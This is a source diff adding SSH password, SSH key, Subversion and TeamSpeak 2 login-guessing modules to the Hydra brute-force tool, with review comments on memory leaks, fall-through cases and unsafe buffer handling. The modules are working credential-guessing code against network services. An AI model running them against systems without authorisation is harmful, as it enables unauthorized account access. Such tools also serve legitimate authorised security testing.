@ -0,0 +1,198 @@
/*
libssh is available at http://www.libssh.org
If you want support for ssh v1 protocol, you
have to add option -DWITH_SSH1=On in the cmake
*/
#include "hydra-mod.h"
#ifndef LIBSSH
void dummy_ssh() {
printf("\n");
}
#else
#include <libssh/libssh.h>
#if LIBSSH_VERSION_MAJOR == 0 && LIBSSH_VERSION_MINOR >= 4
ssh_session session = NULL;
extern char *HYDRA_EXIT;
int new_session = 1;
int start_ssh(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *login, *pass, keep_login[300];
int auth_state = 0, rc = 0, i = 0;
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
if (new_session) {
if (session) {
ssh_disconnect(session);
ssh_finalize();
ssh_free(session);
}
session = ssh_new();
ssh_options_set(session, SSH_OPTIONS_PORT, &port);
ssh_options_set(session, SSH_OPTIONS_HOST, hydra_address2string(ip));
ssh_options_set(session, SSH_OPTIONS_USER, login);
ssh_options_set(session, SSH_OPTIONS_COMPRESSION_C_S, "none");
ssh_options_set(session, SSH_OPTIONS_COMPRESSION_S_C, "none");
if (ssh_connect(session) != 0) {
//if the connection was drop, exit and let hydra main handle it
if (verbose)
hydra_report(stderr, "[ERROR] could not connect to target port %d\n", port);
return 3;
}
if ((rc = ssh_userauth_none(session, NULL)) == SSH_AUTH_ERROR) {
return 3;
} else if (rc == SSH_AUTH_SUCCESS) {
hydra_report_found_host(port, ip, "ssh", fp);
hydra_completed_pair_found();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 2;
else
return 1;
}
} else
new_session = 1;
auth_state = ssh_auth_list(session);
if ((auth_state & SSH_AUTH_METHOD_PASSWORD) > 0) {
auth_state = ssh_userauth_password(session, NULL, pass);
} else if ((auth_state & SSH_AUTH_METHOD_INTERACTIVE) > 0) {
auth_state = ssh_userauth_kbdint(session, NULL, NULL);
while (auth_state == SSH_AUTH_INFO) {
rc = ssh_userauth_kbdint_getnprompts(session);
for (i = 0; i < rc; i++)
ssh_userauth_kbdint_setanswer(session, i, pass);
auth_state = ssh_userauth_kbdint(session, NULL, NULL);
}
} else {
return 4;
}
if (auth_state == SSH_AUTH_ERROR) {
new_session = 1;
return 1;
}
if (auth_state == SSH_AUTH_SUCCESS || auth_state == SSH_AUTH_PARTIAL) {
hydra_report_found_host(port, ip, "ssh", fp);
hydra_completed_pair_found();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 2;
return 1;
} else {
strncpy(keep_login, login, sizeof(keep_login) - 1);
keep_login[sizeof(keep_login) - 1] = '\0';
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 2;
login = hydra_get_next_login();
if (strcmp(login, keep_login) == 0)
new_session = 0;
return 1;
}
/* not reached */
return 1;
}
void service_ssh(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
switch (run) {
case 1: /* connect and service init function */
next_run = start_ssh(sock, ip, port, options, miscptr, fp);
break;
case 2:
ssh_disconnect(session);
ssh_finalize();
ssh_free(session);
hydra_child_exit(0);
case 3:
ssh_disconnect(session);
ssh_finalize();
ssh_free(session);
if (verbose)
fprintf(stderr, "[ERROR] ssh protocol error\n");
hydra_child_exit(2);
case 4:
ssh_disconnect(session);
ssh_finalize();
ssh_free(session);
fprintf(stderr, "[ERROR] ssh target does not support password auth\n");
hydra_child_exit(2);
default:
ssh_disconnect(session);
ssh_finalize();
ssh_free(session);
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(2);
}
run = next_run;
}
}
#else
#error "You are not using v0.4.x. Download from http://www.libssh.org and add -DWITH_SSH1=On in cmake to enable SSH v1 support"
#endif
#endif
int service_ssh_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// 1 skip target without generating an error
// 2 skip target because of protocol problems
// 3 skip target because its unreachable
#ifdef LIBSSH
int rc, method;
ssh_session session = ssh_new();
if (verbose || debug)
printf("[INFO] Testing if password authentication is supported by ssh://%s:%d\n", hydra_address2string(ip), port);
ssh_options_set(session, SSH_OPTIONS_PORT, &port);
ssh_options_set(session, SSH_OPTIONS_HOST, hydra_address2string(ip));
ssh_options_set(session, SSH_OPTIONS_USER, "root");
ssh_options_set(session, SSH_OPTIONS_COMPRESSION_C_S, "none");
ssh_options_set(session, SSH_OPTIONS_COMPRESSION_S_C, "none");
if (ssh_connect(session) != 0) {
fprintf(stderr, "[ERROR] could not connect to ssh://%s:%d\n", hydra_address2string(ip), port);
return 2;
}
rc = ssh_userauth_none(session, NULL);
method = ssh_userauth_list(session, NULL);
ssh_disconnect(session);
ssh_finalize();
ssh_free(session);
if ((method & SSH_AUTH_METHOD_INTERACTIVE) || (method & SSH_AUTH_METHOD_PASSWORD)) {
if (verbose || debug)
printf("[INFO] Successful, password authentication is supported by ssh://%s:%d\n", hydra_address2string(ip), port);
return 0;
}
fprintf(stderr, "[ERROR] target ssh://%s:%d/ does not support password authentication.\n", hydra_address2string(ip), port);
return 1;
#else
return 0;
#endif
}
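
Review bot: In service_ssh, cases 2, 3, 4 and default end at hydra_child_exit() with no `break` or `return`, so correctness depends on that call never returning; if it does, control falls through and `session` is disconnected and freed again. Add `return;` after each call, as the smtp and socks5 modules do. In start_ssh, `auth_state == SSH_AUTH_PARTIAL` is reported through hydra_report_found_host() like a full success although the server still requires a further method, which can produce false positives. In service_ssh_init, the `ssh_connect()` failure path returns 2 without calling ssh_free(session), while the comment above lists 3 as the code for an unreachable target.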

166
hydra-sshkey.c Normal file

@ -0,0 +1,166 @@
/*
libssh is available at http://www.libssh.org
current version is 0.4.8
If you want support for ssh v1 protocol, you
have to add option -DWITH_SSH1=On in the cmake
*/
#include "hydra-mod.h"
#ifndef LIBSSH
void dummy_sshkey() {
printf("\n");
}
#else
#include <libssh/libssh.h>
#if LIBSSH_VERSION_MAJOR == 0 && LIBSSH_VERSION_MINOR >= 4
extern ssh_session session;
extern char *HYDRA_EXIT;
extern int new_session;
int start_sshkey(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *login, *key, keep_login[300];
int auth_state = 0, rc = 0, i = 0;
ssh_private_key privkey;
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(key = hydra_get_next_password()) == 0)
key = empty;
if (new_session) {
if (session) {
ssh_disconnect(session);
ssh_finalize();
ssh_free(session);
}
session = ssh_new();
ssh_options_set(session, SSH_OPTIONS_PORT, &port);
ssh_options_set(session, SSH_OPTIONS_HOST, hydra_address2string(ip));
ssh_options_set(session, SSH_OPTIONS_USER, login);
ssh_options_set(session, SSH_OPTIONS_COMPRESSION_C_S, "none");
ssh_options_set(session, SSH_OPTIONS_COMPRESSION_S_C, "none");
if (ssh_connect(session) != 0) {
//if the connection was drop, exit and let hydra main handle it
if (verbose)
hydra_report(stderr, "[ERROR] could not connect to target port %d\n", port);
return 3;
}
if ((rc = ssh_userauth_none(session, NULL)) == SSH_AUTH_ERROR) {
return 3;
} else if (rc == SSH_AUTH_SUCCESS) {
hydra_report_found_host(port, ip, "sshkey", fp);
hydra_completed_pair_found();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 2;
else
return 1;
}
} else
new_session = 1;
auth_state = ssh_auth_list(session);
if ((auth_state & SSH_AUTH_METHOD_PUBLICKEY) > 0) {
privkey = privatekey_from_file(session, key, 0, NULL);
if (!privkey) {
hydra_report(stderr, "[ERROR] skipping invalid private key: \"%s\"\n", key);
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 2;
return 1;
}
auth_state = ssh_userauth_pubkey(session, NULL, NULL, privkey);
} else {
return 4;
}
if (auth_state == SSH_AUTH_ERROR) {
new_session = 1;
return 1;
}
if (auth_state == SSH_AUTH_SUCCESS || auth_state == SSH_AUTH_PARTIAL) {
hydra_report_found_host(port, ip, "sshkey", fp);
hydra_completed_pair_found();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 2;
return 1;
} else {
strncpy(keep_login, login, sizeof(keep_login) - 1);
keep_login[sizeof(keep_login) - 1] = '\0';
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 2;
login = hydra_get_next_login();
if (strcmp(login, keep_login) == 0)
new_session = 0;
return 1;
}
/* not reached */
return 1;
}
void service_sshkey(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
switch (run) {
case 1: /* connect and service init function */
next_run = start_sshkey(sock, ip, port, options, miscptr, fp);
break;
case 2:
ssh_disconnect(session);
ssh_finalize();
ssh_free(session);
hydra_child_exit(0);
case 3:
ssh_disconnect(session);
ssh_finalize();
ssh_free(session);
fprintf(stderr, "[ERROR] ssh protocol error\n");
hydra_child_exit(2);
case 4:
ssh_disconnect(session);
ssh_finalize();
ssh_free(session);
fprintf(stderr, "[ERROR] ssh target does not support pubkey auth\n");
hydra_child_exit(2);
default:
ssh_disconnect(session);
ssh_finalize();
ssh_free(session);
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(2);
}
run = next_run;
}
}
#else
#error "You are not using v0.4.x. Download from http://www.libssh.org and add -DWITH_SSH1=On in cmake to enable SSH v1 support"
#endif
#endif
int service_sshkey_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}
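Review bot: in start_sshkey the key loaded by privatekey_from_file(session, key, 0, NULL) is never released. Every path after ssh_userauth_pubkey(session, NULL, NULL, privkey) returns without a privatekey_free(privkey), so each attempt leaks a key object; free it right after the ssh_userauth_pubkey call. The same function reports SSH_AUTH_PARTIAL through hydra_report_found_host exactly like SSH_AUTH_SUCCESS, although a partial result means the server still requires another method, so it should be reported differently. In service_sshkey, cases 2, 3, 4 and default call ssh_finalize() before ssh_free(session); free the session first. None of those cases has a break, so they rely on hydra_child_exit never returning, which deserves a comment.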

206
hydra-svn.c Normal file

@ -0,0 +1,206 @@
//This plugin was written by <david dot maciejak at gmail D O T com>
//checked for memleaks on 110425, none found
#ifdef LIBSVN
/* needed on openSUSE */
#define _GNU_SOURCE
#include <svn_client.h>
#include <svn_cmdline.h>
#include <svn_pools.h>
#include <svn_config.h>
#include <svn_fs.h>
#endif
#include "hydra-mod.h"
#ifndef LIBSVN
void dummy_svn() {
printf("\n");
}
#else
extern int hydra_data_ready_timed(int socket, long sec, long usec);
extern char *HYDRA_EXIT;
#define DEFAULT_BRANCH "trunk"
static svn_error_t *print_dirdummy(void *baton, const char *path, const svn_dirent_t * dirent, const svn_lock_t * lock, const char *abs_path, apr_pool_t * pool) {
return SVN_NO_ERROR;
}
static svn_error_t *my_simple_prompt_callback(svn_auth_cred_simple_t ** cred, void *baton, const char *realm, const char *username, svn_boolean_t may_save, apr_pool_t * pool) {
char *empty = "";
char *login, *pass;
svn_auth_cred_simple_t *ret = apr_pcalloc(pool, sizeof(*ret));
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
ret->username = apr_pstrdup(pool, login);
ret->password = apr_pstrdup(pool, pass);
*cred = ret;
return SVN_NO_ERROR;
}
int start_svn(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
int ipv6 = 0;
char URL[1024];
char URLBRANCH[256];
apr_pool_t *pool;
svn_error_t *err;
svn_opt_revision_t revision;
apr_uint32_t dirents;
svn_client_ctx_t *ctx;
svn_auth_provider_object_t *provider;
apr_array_header_t *providers;
if (miscptr)
strncpy(URLBRANCH, miscptr, sizeof(URLBRANCH));
else
strncpy(URLBRANCH, DEFAULT_BRANCH, sizeof(URLBRANCH));
if (svn_cmdline_init("hydra", stderr) != EXIT_SUCCESS)
return 4;
if (ip[0] == 16)
ipv6 = 1;
pool = svn_pool_create(NULL);
err = svn_config_ensure(NULL, pool);
if (err) {
svn_handle_error2(err, stderr, FALSE, "hydra: ");
return 4;
}
if ((err = svn_client_create_context(&ctx, pool))) {
svn_handle_error2(err, stderr, FALSE, "hydra: ");
return 4;
}
if ((err = svn_config_get_config(&(ctx->config), NULL, pool))) {
svn_handle_error2(err, stderr, FALSE, "hydra: ");
return 4;
}
providers = apr_array_make(pool, 1, sizeof(svn_auth_provider_object_t *));
svn_auth_get_simple_prompt_provider(&provider, my_simple_prompt_callback, NULL, /* baton */
0, pool);
APR_ARRAY_PUSH(providers, svn_auth_provider_object_t *) = provider;
/* Register the auth-providers into the context's auth_baton. */
svn_auth_open(&ctx->auth_baton, providers, pool);
revision.kind = svn_opt_revision_head;
if (ipv6)
snprintf(URL, sizeof(URL), "svn://[%s]:%d/%s", hydra_address2string(ip), port, URLBRANCH);
else
snprintf(URL, sizeof(URL), "svn://%s:%d/%s", hydra_address2string(ip), port, URLBRANCH);
dirents = SVN_DIRENT_KIND;
err = svn_client_list2(URL, &revision, &revision, svn_depth_unknown, dirents, FALSE, print_dirdummy, NULL, ctx, pool);
svn_pool_clear(pool);
svn_pool_destroy(pool);
if (err) {
if (verbose)
hydra_report(stderr, "[ERROR] Access refused (error code %d) , message: %s\n", err->apr_err, err->message);
//Username not found 170001 ": Username not found"
//Password incorrect 170001 ": Password incorrect"
if (err->apr_err != 170001) {
return 4; //error
} else {
if (strstr(err->message, "Username not found")) {
hydra_completed_pair_skip();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
} else {
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
}
}
} else {
if (verbose)
hydra_report(stderr, "[VERBOSE] Access granted\n");
hydra_report_found_host(port, ip, "svn", fp);
hydra_completed_pair_found();
return 3;
}
return 3;
}
void service_svn(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_SVN, mysslport = PORT_SVN_SSL;
hydra_register_socket(sp);
while (1) {
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
switch (run) {
case 1: /* connect and service init function */
if (sock >= 0)
sock = hydra_disconnect(sock);
// usleep(300000);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
if (verbose || debug)
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
next_run = 2;
break;
case 2:
next_run = start_svn(sock, ip, port, options, miscptr, fp);
break;
case 3:
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
default:
if (!verbose)
hydra_report(stderr, "[ERROR] Caught unknown return code, try verbose option for more details\n");
hydra_child_exit(0);
}
run = next_run;
}
}
#endif
int service_svn_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}
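Review bot: the strncpy(URLBRANCH, miscptr, sizeof(URLBRANCH)) at the top of start_svn leaves URLBRANCH unterminated when miscptr is 256 bytes or longer, and the later snprintf into URL then reads past the array. Copy sizeof(URLBRANCH) - 1 bytes and set the last byte to '\0', as hydra-sshkey.c does for keep_login. In the error branch, err->apr_err is compared with the literal 170001 and err->message is passed to hydra_report and strstr without a NULL check; use a named constant and guard the message, and pass err to svn_error_clear once it has been inspected. The socket opened in service_svn arrives as s but start_svn never uses it, so the connection made by hydra_connect_tcp or hydra_connect_ssl is not the one svn_client_list2 authenticates over; either drop that connect or document why it is kept.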

141
hydra-teamspeak.c Normal file

@ -0,0 +1,141 @@
#include "hydra-mod.h"
#include "crc32.h"
/*
This module brings support for Teamspeak version 2.x (TS2 protocol)
Tested with version 2.0.r23.b19, server uses to ban ip for 10 min
when bruteforce is detected.
TS1 protocol (tcp/8765) is not supported
TS3 protocol (udp/9987) is not needed as user/pass is not used anymore
*/
struct team_speak {
char header[16];
unsigned long crc;
char clientlen;
char client[29];
char oslen;
char os[29];
char misc[10];
char userlen;
char user[29];
char passlen;
char pass[29];
char loginlen;
char login[29];
};
extern int hydra_data_ready_timed(int socket, long sec, long usec);
extern char *HYDRA_EXIT;
char *buf;
int start_teamspeak(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *login, *pass;
char buf[100];
struct team_speak teamspeak;
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
memset(&teamspeak, 0, sizeof(struct team_speak));
memcpy(&teamspeak.header, "\xf4\xbe\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00", 16);
teamspeak.clientlen = 9;
strcpy((char *) &teamspeak.client, "TeamSpeak");
teamspeak.oslen = 11;
strcpy((char *) &teamspeak.os, "Linux 2.6.9");
memcpy(&teamspeak.misc, "\x02\x00\x00\x00\x20\x00\x3c\x00\x01\x02", 10);
teamspeak.userlen = strlen(login);
strncpy((char *) &teamspeak.user, login, 29);
teamspeak.passlen = strlen(pass);
strncpy((char *) &teamspeak.pass, pass, 29);
teamspeak.loginlen = 0;
strcpy((char *) &teamspeak.login, "");
teamspeak.crc = crc32(&teamspeak, sizeof(struct team_speak));
if (hydra_send(s, (char *) &teamspeak, sizeof(struct team_speak), 0) < 0) {
return 3;
}
if (hydra_data_ready_timed(s, 5, 0) > 0) {
hydra_recv(s, (char *) buf, sizeof(buf));
if (buf[0x58] == 1) {
hydra_report_found_host(port, ip, "teamspeak", fp);
hydra_completed_pair_found();
}
}
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
void service_teamspeak(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_TEAMSPEAK;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
run = 3;
while (1) {
switch (run) {
case 1: /* connect and service init function */
// if (sock >= 0)
// sock = hydra_disconnect(sock);
// usleep(300000);
if (sock < 0) {
if (port != 0)
myport = port;
sock = hydra_connect_udp(ip, myport);
port = myport;
if (sock < 0) {
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
}
next_run = start_teamspeak(sock, ip, port, options, miscptr, fp);
break;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(2);
return;
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(2);
}
run = next_run;
}
}
int service_teamspeak_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}
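Review bot: start_teamspeak tests buf[0x58] after hydra_recv(s, (char *) buf, sizeof(buf)) without looking at how many bytes arrived, and buf[100] is an uninitialized stack array, so a short or failed read makes the check depend on stale stack contents and can report a false hit. Keep the return value of hydra_recv and require at least 0x59 bytes before reading that offset. On a hit the code calls hydra_completed_pair_found() and then falls through to hydra_completed_pair(), so the pair is completed twice; return or skip the second call. The packet is sent as a raw struct team_speak with unsigned long crc, whose size and padding differ between platforms; a fixed-width 32-bit type and a packed layout would keep the wire format stable. userlen and passlen are set from strlen() while strncpy copies at most 29 bytes, so credentials longer than the field produce a length byte that does not match the data. The file-scope char *buf is shadowed by the local array and can be removed.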

Some files were not shown because too many files have changed in this diff